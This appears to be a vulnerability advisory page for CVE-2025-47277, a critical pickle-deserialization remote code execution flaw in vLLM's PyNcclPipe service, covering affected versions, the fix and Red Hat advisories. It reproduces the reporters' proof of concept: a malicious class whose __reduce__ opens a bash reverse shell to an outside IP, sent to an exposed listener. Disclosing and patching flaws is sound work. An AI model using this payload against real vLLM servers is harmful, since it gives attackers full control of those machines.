CVE-2025-47277 is a critical-severity (CVSS 9.8) Deserialization of Untrusted Data vulnerability in vllm. A fix is available for vllm — see the affected versions and patch details below.
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
Exploitation Status
No confirmed exploitation observed yet
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
- A successful exploit gives an attacker total control of the affected component, not partial access.
- CISA’s own triage has not observed active exploitation or public proof-of-concept code for this CVE as of its last assessment.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-47277.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
vllmReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Impacted Environments
This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.
Summary
vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.
A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.
The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html
Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.
This issue was reported privately to PyTorch and they determined that this behavior was intentional.
Details
The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.
- Deploy a
PyNcclPipeservice configured to listen on port18888when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig
config=KVTransferConfig(
kv_ip="0.0.0.0",
kv_port=18888,
kv_rank=0,
kv_parallel_size=1,
kv_buffer_size=1024,
kv_buffer_device="cpu"
)
p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
- The attacker crafts malicious packets and sends them to the
PyNcclPipeservice:
from vllm.distributed.utils import StatelessProcessGroup
class Evil:
def __reduce__(self):
import os
cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
return (os.system,(cmd,))
client = StatelessProcessGroup.create(
host='172.17.0.1',
port=18888,
rank=1,
world_size=2,
)
client.send_obj(obj=Evil(),dst=0)
The call stack triggering RCE is as follows:
vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
-> pickle.loads
Getshell as follows:
Reporters
This issue was reported independently by three different parties:
- @kikayli (Zhuque Lab, Tencent)
- @omjeki
- Russell Bryant (@russellb)
Fix
- https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the
TCPStoresocket to the private interface as configured.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | vllm | ≥ 0.6.5&&< 0.8.5 | 0.8.5pip install --upgrade 'vllm==0.8.5' |
Affected Products
vllmvllmDetection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for vllm, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update vllm to 0.8.5 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-47277 is resolved across your whole dependency graph.
Workarounds
Do not deserialise data from untrusted sources: where the format allows it, restrict deserialisation to an explicit allowlist of expected types, and prefer a data-only format (JSON, Protobuf) over one that can reconstruct arbitrary objects until you can upgrade.
Fixing This On Your OS
If you run this on a Linux distribution, patch through your package manager against the distro's own security advisory below — it tracks the exact backported fix for your release, which can ship on a different timeline (and sometimes a different severity) than the upstream project.
By default, Red Hat products are configured to restrict vLLM nodes to an isolated network. However, this vulnerability could become relevant if customers change the specific configurations, and therefore, Red Hat products are affected. This vulnerability is classified as Moderate rather than Critical because its…
No mitigation is currently available that meets Red Hat Product Security’s standards for usability, deployment, applicability, or stability.Source: Red Hat security advisory for CVE-2025-47277 (CC BY 4.0)
| Product | Fixed in | Advisory |
|---|---|---|
| Red Hat AI Inference Server 3.1 | rhaiis/vllm-rocm-rhel9:3.1.0-1751522540 | RHSA-2025:10403 |
| Red Hat AI Inference Server 3.1 | rhaiis/vllm-cuda-rhel9:3.1.0-1751522544 | RHSA-2025:10404 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/instructlab-nvidia-rhel9:1.5.3-1756791365 | RHSA-2025:15832 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/bootc-intel-rhel9:1.5.3-1756724193 | RHSA-2025:15836 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/bootc-gcp-nvidia-rhel9:1.5.3-1756815294 | RHSA-2025:15837 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/bootc-aws-nvidia-rhel9:1.5.3-1756815228 | RHSA-2025:15838 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/bootc-amd-rhel9:1.5.3-1756800437 | RHSA-2025:15839 |
| Red Hat Enterprise Linux AI 1.5 | rhelai1/bootc-azure-amd-rhel9:1.5.3-1756815221 | RHSA-2025:15840 |
Frequently Asked Questions
Is CVE-2025-47277 in your dependencies?
Find it across PyPI, including transitive dependencies.